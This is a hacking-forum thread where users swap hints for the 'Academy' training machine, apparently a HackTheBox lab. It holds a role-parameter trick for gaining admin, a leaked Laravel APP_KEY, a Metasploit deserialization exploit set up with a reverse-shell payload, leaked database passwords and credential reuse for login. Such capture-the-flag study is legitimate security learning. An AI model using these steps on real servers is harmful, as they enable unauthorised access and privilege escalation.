TUTORIAL Academy Discussion
by Ro0ted - November 07, 2020 at 09:49 PM
If anyone has any hints for the box, feel free to post here :)
Registered a user with the admin role by changing role from 0 to 1 in request - from there logged into /admin.php panel and saw tasks completed. Added dev/staging subdomain to hosts and saw Laravel debug info - db creds leaked but haven't been able to do anything with them.
port 33060 open but haven't had any luck with mysql cli. :/

any help?
Anything, guys? Please help, I'm a little confused after getting creds. Tried SMTP, but hey, please help.
use metasploit module with app_key
(November 07, 2020 at 11:20 PM)Ro0ted Wrote: use metasploit module with app_key

set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit
[*] Exploit completed, but no session was created.

Any thoughts?
Hmmmm have u set everything well
(November 07, 2020 at 11:29 PM)guest55 Wrote: Hmmmm have u set everything well

Does this look correct?
msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

  Name       Current Setting                               Required  Description
  ----       ---------------                               --------  -----------
  APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
  Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                                            yes       The target port (TCP)
  SSL        false                                         no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                                             yes       Path to target webapp
  VHOST      academy.htb                                   no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  LHOST  10.10.xx.xxx     yes       The listen address (an interface may be specified)
  LPORT  4444             yes       The listen port
the vhost is wrong, you have to put the vhost you found in admin panel
set vhost dev-staging-01.academy.htb

got a foothold. now what lol

looks like a bunch of users. hmmmm.

Hmmm, cracked some bcrypt hashes found from linpeas but it appears it's just the homestead db password: "secret"
I can't connect to forge or homestead dbs as www-data. I keep getting "Access denied for user 'XXXXX'@'localhost'"

Tried to get stuff from redis but redis-cli isn't installed. Where is everyone else looking? I feel as though it's right in front of my face and I'm just missing it.

Wondering if anyone was able to connect with the info in: /var/www/html/academy/.env???

Trying to connect:
[email protected]:/var/www/html/academy$ mysql -u dev -h -D academy -p
mysql -u dev -h -D academy -p
Enter password: mySup3rP4s5w0rd!!

ERROR 1045 (28000): Access denied for user 'dev'@'localhost' (using password: YES)
password for cry0l1t3 user is in here, just su or you can ssh in
(November 08, 2020 at 12:32 AM)ragnarokhype Wrote: password for cry0l1t3 user is in here, just su or you can ssh in

Ahhhh Thank you! I didn't think of using the db password for user login. Now on to the privesc...
just rooted - what a ride
